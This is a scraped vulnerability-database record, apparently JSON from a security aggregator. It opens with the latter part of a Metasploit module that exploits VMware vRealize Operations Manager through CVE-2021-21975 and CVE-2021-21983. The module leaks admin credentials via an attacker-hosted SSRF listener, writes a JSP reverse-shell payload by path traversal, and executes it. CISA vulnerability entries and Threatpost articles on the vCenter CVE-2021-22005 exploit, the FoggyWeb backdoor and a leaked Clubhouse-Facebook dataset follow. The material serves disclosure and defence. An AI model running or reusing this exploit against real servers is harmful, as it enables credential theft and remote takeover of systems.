\n \nThe following vRealize Operations Manager versions are vulnerable: \n \n* 7.0.0 \n* 7.5.0 \n* 8.0.0, 8.0.1 \n* 8.1.0, 8.1.1 \n* 8.2.0 \n* 8.3.0 \n \nVersion 8.3.0 is not exploitable for creds and is therefore not \nsupported by this module. Tested against 8.0.1. \n}, \n'Author' => [ \n'Egor Dimitrenko', # Discovery \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-21975'], # SSRF \n['CVE', '2021-21983'], # File write \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'], \n['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'], \n['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis'] \n], \n'DisclosureDate' => '2021-03-30', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => 'linux', \n'Arch' => ARCH_JAVA, \n'Privileged' => false, \n'Targets' => [ \n['vRealize Operations Manager < 8.3.0', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SRVPORT' => 8443, \n'SSL' => true, \n'PAYLOAD' => 'java/jsp_shell_reverse_tcp' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs \nARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa \n] \n}, \n'Stance' => Stance::Aggressive \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef setup \nsuper \n \n@creds = nil \n \nprint_status('Starting SSRF server...') \nstart_service \nend \n \ndef check \nleak_admin_creds ? 
CheckCode::Vulnerable : CheckCode::Safe \nend \n \ndef exploit \nreturn unless (@creds ||= leak_admin_creds) \n \nwrite_jsp_payload \nexecute_jsp_payload \nend \n \ndef leak_admin_creds \n# \"Comment out\" trailing path using URI fragment syntax, ostensibly \nssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\" \n \nprint_status('Leaking admin creds via SSRF...') \nvprint_status(ssrf_uri) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'), \n'ctype' => 'application/json', \n'data' => [ssrf_uri].to_json \n) \n \nunless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri \nprint_error('Failed to send SSRF request') \nreturn \nend \n \nunless @creds \nprint_error('Failed to leak admin creds') \nreturn \nend \n \nprint_good('Successfully leaked admin creds') \nvprint_status(\"Authorization: #{@creds}\") \n \n@creds \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"#{cli.peerhost} connected to SSRF server!\") \nvprint_line(request.to_s) \n \n@creds ||= request.headers['Authorization'] \nensure \nsend_not_found(cli) \nclose_client(cli) \nend \n \ndef write_jsp_payload \njsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\" \n \nprint_status('Writing JSP payload') \nvprint_status(jsp_path) \n \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part( \n\"../../../../..#{jsp_path}\", \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n'form-data; name=\"name\"' \n) \nmultipart_form.add_part( \npayload.encoded, \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n%(form-data; name=\"file\"; filename=\"#{jsp_filename}\") \n) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'), \n'authorization' => @creds, \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n) \n \nunless res&.code == 200 
\nfail_with(Failure::NotVulnerable, 'Failed to write JSP payload') \nend \n \nregister_file_for_cleanup(jsp_path) \n \nprint_good('Successfully wrote JSP payload') \nend \n \ndef execute_jsp_payload \njsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename) \n \nprint_status('Executing JSP payload') \nvprint_status(full_uri(jsp_uri)) \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => jsp_uri, \n'authorization' => @creds \n) \n \nunless res&.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to execute JSP payload') \nend \n \nprint_good('Successfully executed JSP payload') \nend \n \ndef jsp_filename \n@jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\" \nend \n \nend \n`\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/162349/vmware_vrops_mgr_ssrf_rce.rb.txt"}], "cisa_kev": [{"lastseen": "2023-05-27T15:17:54", "description": "Server Side Request Forgery (SSRF) in vRealize Operations Manager API prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API to perform a SSRF attack to steal administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "VMware Server Side Request Forgery in vRealize Operations Manager API", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-21975", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T15:17:54", "description": "VMware vCenter Server contains a file upload vulnerability in the Analytics service that allows a user with network access to port 443 to execute code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "VMware vCenter Server File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-22005", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-09-28T22:42:30", "description": "On its own, the database of 3.8 billion 
phone numbers [leaked from ](<https://threatpost.com/clubhouse-users-data-hacker-forum/165354/>) social-media platform Clubhouse didn\u2019t have much value on the underground market. In fact, they were eventually dumped in a hacker forum for free.\n\nBut an enterprising threat actor has reportedly combined those phone numbers with 533 million [Facebook profiles leaked last April](<https://threatpost.com/facebook-accounts-leaked-check-exposed/165245/>) and is selling that enhanced trove of personal identifiable information (PII) to the highest bidder on the underground market.\n\nAccording to CyberNews, the combined [Clubhouse-Facebook database](<https://cybernews.com/security/3-8-billion-allegedly-scraped-and-merged-clubhouse-and-facebook-user-records-put-for-sale-online/>) includes names, phone numbers and other data, and is listed on an underground forum for $100,000 for all 3.8 billion entries, with smaller chunks of data available for less. Reportedly, the seller is still looking for buyers.\n\n## **Data Likely to Fuel ATO Attacks **\n\nThese credentials could quickly be leveraged for basic account takeover (ATO) attacks, according to Brian Uffelman, who is a security analyst for PerimeterX.\n\n\u201cThese stolen credentials are then used for credential-stuffing and ATO attacks, which can steal value, whether that is in the form of gift cards, credit-card numbers, loyalty points or making false purchases,\u201d Uffelman told Threatpost. \u201cATO attacks are a major threat to any business and all of this just creates more fuel to feed the ATO attack fire.\u201d\n\nHe added that it\u2019s much easier for cybercriminals to use stolen credentials than to do the work of trying to find holes in an organization\u2019s cybersecurity defenses. 
In fact, Uffelman pointed out PerimeterX research showed out of all login attempts measured in the second-half of 2020, up to 85 percent were ATO attempts.\n\n\u201cOrganizations need to be aware of signs that they\u2019ve been attacked,\u201d Uffelman warned. \u201cThese can include surges in help-desk calls, spikes in password resets and inhuman user behaviors, such as thousands of login attempts on an account in a short time period and then take the appropriate action to block these attacks.\u201d\n\nUsers need to be aware of signs of breach, too, he added.\n\n\u201cConsumers need to ensure they are using varied and robust passwords across different websites and applications and lock down their credit reports as well.\u201d\n\n## **Facebook-Clubhouse Data Will Fuel Smishing Attacks **\n\n[Smishing](<https://threatpost.com/smishing-text-phishing-ciso-radar/165634/>), or socially engineered phishing attempts conducted through SMS text messages, is a likely way cybercriminals will try to turn this database into profit, Jake Williams, from BreachQuest told Threatpost.\n\n\u201cWith this information, threat actors can send SMS phishes while spoofing the sender\u2019s number of a known friend,\u201d Williams said. \u201cA threat actor could go even further by using an SMS phishing pretext tailored to the victim based on their recent Facebook posts. 
Users are advised to be extremely careful in acting on unexpected SMS messages, even from senders they believe they know.\u201d\n\nWilliams added that Clubhouse users need to be on the lookout for suspicious texts, particularly those asking to transfer funds or confirm requests with a phone call, which are both common smishing tactics.\n\nAnd even if petty thieves don\u2019t see the value in the information, John Bambenek from Netenrich told Threatpost that he suspects intelligence agencies will take notice.\n\n\u201cBreaches like these often get sold at a discount because the ones who stole the data don\u2019t know what to do with it. In some cases, intelligence agencies will buy them if they have targets of interest on those platforms,\u201d Bambenek said. \u201cLikely the biggest use will go into the secondary consumer data market for those who want to build profiles for specific ad targeting.\u201d\n\nBeyond immediate ramifications of the enhanced data falling into the wrong hands, Archie Agarwal from ThreatModeler pointed out that as these leaks continue, it will enable threat actors to create incredibly rich profiles of targets.\n\n\u201cAside from using data like this for more targeted scamming, there is a much larger concern,\u201d Agarwal told Threatpost. \u201cAs we share more and more personal information across an ever-growing list of social-media platforms, combining data gleaned from this type of scraping, together with leaked breach information and leveraging big-data analytics to mine it, could potentially reveal previously hidden information and behaviors on users.\u201d\n\n## **Users Have Accepted Risks **\n\nWhile the infosec community is alarmed by the prospect of all that data floating around, Roger Grimes from KnowBe4 doesn\u2019t expect the seller of the combined Clubhouse-Facebook data to get much financial gain out of the deal.\n\n\u201cMy bet is the seller doesn\u2019t get anywhere close to their $100,000 asking price. 
It\u2019s not a scarce resource,\u201d Grimes said in an email to Threatpost.\n\nHe also noted that while he agrees the data could fuel future smishing and other socially engineered attacks, he doesn\u2019t suspect much pushback from users.\n\n\u201cI think most people simply see this as a cost of using free internet services, Clubhouse or any other service,\u201d he said.\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. _[_JOIN_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[_4 Golden Rules of Linux Security_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[_REGISTER NOW_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. 
Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-27T14:59:58", "type": "threatpost", "title": "3.8 Billion Users\u2019 Combined Clubhouse, Facebook Data Up for Sale", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T14:59:58", "id": "THREATPOST:5E56D9C77DAD674F8B21F56E904893D4", "href": "https://threatpost.com/clubhouse-facebook-data-sale/175023/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-29T14:13:43", "description": "The threat actors behind the notorious SolarWinds supply-chain attacks have dispatched new malware to steal data and maintain persistence on victims\u2019 networks, researchers have found.\n\nResearchers from the Microsoft Threat Intelligence Center (MSTIC) have observed the APT it calls Nobelium using a post-exploitation backdoor dubbed FoggyWeb, to attack Active Directory Federation Services (AD FS) servers. AD FS enables single sign-on (SSO) across cloud-based apps in a Microsoft environment, by sharing digital identity and entitlements rights.\n\nThe attacks started as far back as April, Ramin Nafisi from MSTIC wrote in a [blog post](<https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/>) published Monday.\n\nNobelium is employing \u201cmultiple tactics to pursue credential theft\u201d to gain admin privileges to AD FS servers, Nafisi wrote. 
Then, once a server is compromised, the threat group deploys FoggyWeb \u201cto remotely exfiltrate the configuration database of compromised AD FS servers, decrypted [token-signing certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/token-signing-certificates>) and [token-decryption certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/certificate-requirements-for-federation-servers>),\u201d he said, which can be used to penetrate into users\u2019 cloud accounts.\n\nIn addition to remotely exfiltrating sensitive data, FoggyWeb also achieves persistence and communicates with a command-and-control (C2) server to receive additional malicious components and execute them, Nafisi added.\n\n## **Backdoor Breakdown**\n\nNafisi provides a thorough breakdown of the sophisticated FoggyWeb backdoor, which operates by allowing abuse of the Security Assertion Markup Language (SAML) token in AD FS, he explained in the post.\n\n\u201cThe backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target\u2019s AD FS deployment,\u201d Nafisi wrote. \u201cThe custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor.\u201d\n\nAttackers store the malware in an encrypted file called _Windows.Data.TimeZones.zh-PH.pri_, while the malicious file _version.dll_ acts as a loader. The DLL file leverages the CLR hosting interfaces and APIs to load FoggyWeb, a managed DLL, in the same Application Domain within which legitimate AD FS managed code is executed.\n\nIn this way, FoggyWeb gains access to the AD FS codebase and resources, including the AD FS configuration database. 
The malware also inherits AD FS service account permissions that are required to access the AD FS configuration database, Nafisi wrote.\n\nAdditionally, \u201cbecause FoggyWeb is loaded into the same application domain as the AD FS managed code, it gains programmatical access to the legitimate AD FS classes, methods, properties, fields, objects and components that are subsequently leveraged by FoggyWeb to facilitate its malicious operations,\u201d he added.\n\nMoreover, FoggyWeb is also AD FS version-agnostic, which means it doesn\u2019t need to keep track of legacy versus modern configuration table names and schemas, named pipe names and other version-dependent properties of AD FS, Nafisi wrote.\n\n## **Malware Mitigation**\n\nMicrosoft has notified all customers observed being targeted or compromised by FoggyWeb, as well as included a comprehensive list of compromise indicators in the post.\n\nThe company also has recommended several mitigation actions for organizations, including: Auditing of on-premises and cloud infrastructure to identify any changes the actor might have made to maintain access; removing user and app access, reviewing configurations for each, and re-issuing new, strong credentials; and using a hardware security module to prevent the exfiltration of sensitive data.\n\nMicrosoft also is advising that all customers review their AD FS Server configuration and implement whatever changes are needed to secure the systems from attacks.\n\n## **Tracking a Known Threat Actor**\n\nMicrosoft researchers have been keeping a wary eye on Nobelium since the company [got caught up](<https://threatpost.com/microsoft-solarwinds-spy-attack-federal-agencies/162414/>) in the [SolarWinds attack](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that was first discovered late last year. 
They\u2019ve been tracking the threat group\u2019s activity and capabilities, which have expanded as the actors have built and deployed new malware.\n\nSince [the SolarWinds incident](<https://threatpost.com/dhs-sophisticated-cyberattack-foreign-adversaries/162242/>), researchers have observed Nobelium steadily building out its arsenal beyond the Sunburst/Solorigate backdoor and Teardrop malware it initially deployed in that attack, which reached tens of thousands of organizations around the globe (though fewer than 100 were selected by the attackers for actual breach and compromise).\n\nThe group used malware called [Raindrop](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) in those follow-on SolarWinds attacks, then later added [GoldMax, GoldFinder and Sibot](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) malware for layered persistence to its toolset.\n\nMicrosoft researchers also identified EnvyScout, BoomBox, NativeZone and VaporRage as four pieces of malware that were used in a Nobelium [email-based attack chain](<https://threatpost.com/solarwinds-nobelium-phishing-attack-usaid/166531/>) earlier this year.\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. _[**_JOIN_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[**_4 Golden Rules of Linux Security_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[**_REGISTER NOW_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. 
Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T14:39:49", "type": "threatpost", "title": "SolarWinds Attackers Hit Active Directory Servers with FoggyWeb Backdoor", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T14:39:49", "id": "THREATPOST:CD203B10BCB138850F42815F74C8A5AF", "href": "https://threatpost.com/solarwinds-active-directory-servers-foggyweb-backdoor/175056/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T22:42:30", "description": "A fully working exploit for the critical CVE-2021-22005 remote code-execution (RCE) vulnerability in VMware vCenter is now public and being exploited in the wild.\n\nReleased on Monday by Rapid7 security engineer William Vu (who goes by the Twitter handle [wvu](<https://twitter.com/wvuuuuuuuuuuuuu>)), this one\u2019s different from the incomplete proof-of-concept (PoC) exploit that began making the rounds on Friday. This variant can be used to open a reverse shell on a vulnerable server, allowing remote attackers to execute arbitrary code.\n\nThe vulnerability can be exploited by unauthenticated, remote users and allows attackers to upload a file to the vCenter Server analytics service.\n\n## UPDATE: Indicators of Exploit\n\nUPDATE: 092821 16:21 The attack team at the attack surface management firm Randori also has a working RCE exploit for CVE-2021-22005. 
Zero-day finder Aaron Portnoy detailed the exploit in his [attack notes](<https://www.randori.com/blog/technical-analysis-vcenter-vmsa-2021-0020/>), which also include detection methods and indicators of exploit that defenders can use to determine whether or not they\u2019ve been exploited by this bug.\n\nRandori confirmed what VMware, CISA and everybody else is saying: Namely, that these vulnerabilities \u201care very serious issues,\u201d and that affected organizations \u201cshould take immediate action to ensure the security of impacted devices.\u201d As it is, Portnoy said, CISA has predicted a high likelihood that foreign actors will move quickly to exploit the vulnerability.\n\nPortnoy also reiterated what VMware has already stressed: To wit, users should just assume that they\u2019re already infected. \u201cOrganizations that have or had affected vCenter versions exposed to the Internet, since the vulnerability was made public on September 21, should assume that an adversary may have gained access to their network and review historical logs for anomalous behavior, such as abnormal usernames or source IP connections, and signs of compromise,\u201d he wrote.\n\nBelow is Vu\u2019s unredacted RCE proof-of-concept exploit against endpoints in servers that have the Customer Experience Improvement Program (CEIP) component enabled. Through [CEIP](<https://www.vmware.com/solutions/trustvmware/ceip.html>), VMware collects technical information about customers\u2019 use of its products. 
The CEIP is toggled [on as a default](<https://docs.vmware.com/en/VMware-Cloud-Foundation/4.0/com.vmware.vcf.vxrail.admin.doc/GUID-2B70F601-7D01-4609-AB1A-870A20485B67.html#:~:text=The%20Join%20the%20VMware%20Customer,Click%20Apply.>) setting in VMware Cloud Foundation.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28100106/Unredacted-RCE-PoC-against-CEIP-e1632837685764.png>)\n\nUnredacted RCE PoC against VMware\u2019s CEIP. Source: [wvu](<https://twitter.com/wvuuuuuuuuuuuuu/status/1442634215330390020/photo/1>).\n\nNot that configurations matter with this vulnerability, VMware said last week. \u201cThis vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,\u201d said Bob Plankers, technical marketing architect at VMware, when VMware [announced](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) the vulnerability on Tuesday.\n\nCERT/CC vulnerability analyst [Will Dormann](<https://twitter.com/wdormann>) noted that a redacted PoC that Vu listed at the start of a thread that began on Friday didn\u2019t require CEIP to be enabled. \u201cUnclear if THAT one is being used in the wild now,\u201d Dormann said.\n\nAccording to Vu\u2019s [technical analysis](<https://www.bleepingcomputer.com/news/security/working-exploit-released-for-vmware-vcenter-cve-2021-22005-bug/>), the full, unredacted PoC starts with a request to create a directory for path traversal and schedules the spawn of a reverse shell.\n\n## History of a Bad Bug\n\n[VMware announced](<https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/>) CVE-2021-22005 a week ago, on Sept. 
21, as part of a [security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that included patches for 19 CVE-numbered vulnerabilities that affect the company\u2019s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.\n\nThey were all serious, but CVE-2021-22005 \u2013 a critical arbitrary file upload vulnerability in the Analytics service \u2013 was assigned a CVSSv3 base score of 9.8 out of a maximum severity rating of 10. VMware urged users to declare an \u201cemergency change\u201d per [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types and to patch as soon as possible.\n\nAlso, on Friday, the Cybersecurity and Infrastructure Security Agency [(CISA) warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>) that VMware had confirmed that threat actors were exploiting the bug and that security researchers were reporting mass scanning for vulnerable vCenter servers and publicly available exploit code. 
CISA urged users with vulnerable systems to prioritize updating or to apply VMware\u2019s [workaround](<https://kb.vmware.com/s/article/85717>).\n\n\u201cDue to the availability of exploit code, CISA expects widespread exploitation of this vulnerability,\u201d the advisory stated.\n\n## Know What Assets Need to Be Patched\n\nIn addition to prioritizing patching, it\u2019s important to know about all the assets that need to be patched, according to Greg Fitzgerald, co-founder of the cybersecurity firm Sevco Security.\n\n\u201cWe\u2019ve found that the vast majority of enterprises have robust patch management tools that are extremely effective at what they\u2019re designed to do: Applying patches to assets that security and IT teams know about,\u201d he told Threatpost via email on Tuesday.\n\nHe continued: \u201cCompanies are not getting breached because their patch management tools aren\u2019t good enough. They\u2019re getting breached because it\u2019s impossible to patch an asset you don\u2019t know is there in the first place. Maintaining an accurate IT asset inventory in a dynamic environment is really hard to do. Threat actors figured that out a long time ago and work around the clock to exploit it. The first step to combating threats like this one is to establish a continuously updated, accurate inventory of all enterprise assets to serve as a foundational control for your security program.\u201d\n", "cvss3": {}, "published": "2021-09-28T15:06:20", "type": "threatpost", "title": "Working PoC Is Out for VMware vCenter CVE-2021-22005 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T15:06:20", "id": "THREATPOST:5E0AFAA7B317D1BA456F06AE1A56D0A3", "href": "https://threatpost.com/working-exploit-vmware-vcenter-cve-2021-22005/175059/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-22T16:20:45", "description": "VMware has released a [security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that includes patches for 19 CVE-numbered vulnerabilities that affect the company\u2019s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.\n\nThey\u2019re all serious, but one \u2013 CVE-2021-22005, a critical arbitrary file upload vulnerability in the Analytics service that\u2019s been assigned the maximum CVSSv3 base score of 9.8 \u2013 is uber nasty.\n\n\u201cThis vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,\u201d [said Bob Plankers](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>), Technical Marketing Architect at VMware.\n\nThe time to act is 
yesterday, Plankers wrote:\n\n> \u201cIn this era of ransomware it is safest to assume that an attacker is already inside your network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible.\u201d \u2014Bob Plankers, [VMware vSphere blog](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)\n\nThe security update addresses flaws in vCenter Server 6.5, 6.7, and 7.0.\n\n## When to Act?\n\nThe time to act is \u201cRight now,\u201d Plankers said. \u201cThese updates fix a critical security vulnerability, and your response needs to be considered at once.\u201d\n\nCVE-2021-22005 can be used to execute commands and executables on the vCenter Server Appliance. The company didn\u2019t tiptoe around the need for urgent action: Users should patch this vulnerability \u201cimmediately,\u201d VMware said in its [FAQ for VMSA-2021-0020](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>). The bug could have nasty repercussions, with exploits likely being hammered out \u201cminutes after the disclosure,\u201d it said:\n\n> \u201cThe ramifications of this vulnerability are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available.\u201d [\u2014VMware FAQ](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>)\n\n## Assume That Attackers Are Already In Your System\n\nThis is a ransomware-friendly bug. 
VMware pointed to the [all-too-real threat](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>) of spiraling ransomware attacks: a growing risk that makes the \u201csafest stance\u201d the assumption that threat actors have already seized control of a desktop and a user account via [phishing](<https://threatpost.com/hackers-deep-sea-phishing/174868/>) or [spearphishing](<https://threatpost.com/linkedin-spear-phishing-job-hunters/165240/>) attacks, it said.\n\nIf a phishing attack has compromised an account(s), it means that the attacker \u201cmay already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence,\u201d VMware stressed.\n\nThis patch is considered an \u201cemergency change\u201d for organizations that practice change management using the [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types, the company said. An emergency change is one that must be introduced ASAP: for example, to resolve a major incident or implement a security patch.\n\nGranted, the decision on how to proceed is up to individual organizations, all of which have different environments, tolerance for risk, security controls and risk mitigation strategies. \u201cThe decision on how to proceed is up to you,\u201d VMware said, but still, given the severity, the company strongly recommends that users act.\n\n## The Other 18 Flaws Are Still Attacker Candy\n\nThe other security issues addressed in Tuesday\u2019s update have lower CVSS scores, but they\u2019re still ripe for the plucking by any attacker that\u2019s already compromised organizations\u2019 networks. 
That\u2019s one of the \u201cbiggest problems facing IT today,\u201d Plankers wrote: the fact that cyberattackers can persist on a compromised network, \u201cpatiently and quietly\u201d biding their time to eventually move laterally as they use compromised accounts to break into other systems over long periods of time.\n\n\u201cThey steal confidential data, intellectual property, and at the end install ransomware and extort payments from their victims,\u201d Plankers explained. \u201cLess urgent security vulnerabilities can still be potential tools in the hands of attackers, so VMware always recommends patching to remove them.\u201d\n\n## How to CYA (Cover Your Assets)?\n\nIf possible, the quickest way to resolve these serious issues is to patch vCenter Server. If that\u2019s not possible, VMware has workarounds, but only for the critical vulnerability, CVE-2021-22005. The workaround is listed in the [response matrix](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) at the bottom of VMware\u2019s VMware Security Advisory (VMSA), VMSA-2021-0020.\n\nThe workaround involves editing a text file on the VCSA and restarting services.\n\nStill, if possible, patching should be the first choice for a few reasons, Plankers advised:\n\n> First, if you can patch vCenter Server, do it. In general, this is the fastest way to resolve this problem, doesn\u2019t involve editing files on the vCenter Server Appliance (VCSA), and removes the vulnerabilities completely. Patching also carries less technical debt and less risk than using a workaround. \u2014Bob Plankers\n\nOther security controls that can help to protect users\u2019 networks until they can patch include using network perimeter access controls or the vCenter Server Appliance firewall to curtail access to the vCenter Server management interfaces. \u201cWe always strongly suggest limiting access to vCenter Server, ESXi, and vSphere management interfaces to only vSphere Admins,\u201d Plankers said. 
